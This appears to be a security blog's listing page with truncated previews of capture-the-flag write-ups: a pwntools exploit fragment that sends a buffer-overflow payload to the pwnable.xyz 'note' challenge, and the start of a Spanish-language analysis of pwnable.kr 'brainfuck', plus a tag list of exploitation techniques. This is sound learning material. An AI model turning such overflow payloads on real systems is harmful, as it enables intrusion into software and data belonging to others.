Exploit from pwn import * import time context.log_level = 'debug' p = remote("svc.pwnable.xyz",30016) #p = process('./note') #gdb.attach(p,''' #break *0x0000000000400a10 #continue #''') p.recvuntil("> ") p.sendline("1") p.recvuntil("Note len? ") p.sendline("38") p.recvuntil("note: ") payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x20\x12\x60\x00" p.sendline(payload) p.recvuntil("> ") p.sendline("2"..
Brainfuck Date: 08/01/2019-09/01/2019 @naivenom 4.1 Reconocimiento gef➤ checksec [+] checksec for '/home/binary/pwnable.kr/brainfuck/bf' Canary : Yes NX : Yes PIE : No Fortify : No RelRO : Partial Canary and NX (No shellcode) 4.2 Deep Reversing Analysis Como no puede ser de otra manera vamos solo a centrarnos en realizar reversing instrucción por instrucción y tomar notas de que es lo que esta s..
- Total
- Today
- Yesterday
- open-redirect
- dnspy
- fake stack frame
- XSS
- leak stack memory address
- x64dbg
- html injection
- arithmetic overflow/underflow
- 32Bit
- cracking
- canary
- Backdoors
- shellcode
- write primitive
- ASM
- stack pivot
- Pwnable.kr
- hijacking redirection flow
- GOT Dereferencing/Overwriting
- return oriented programming
- theFaunia course
- pwnable.xyz
- Windows
- leak libc
- buffer overflow
- Call oriented programming
- use after free
- format string
- one gadget
- pwnable.tw
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | |||
5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | 28 | 29 | 30 | 31 |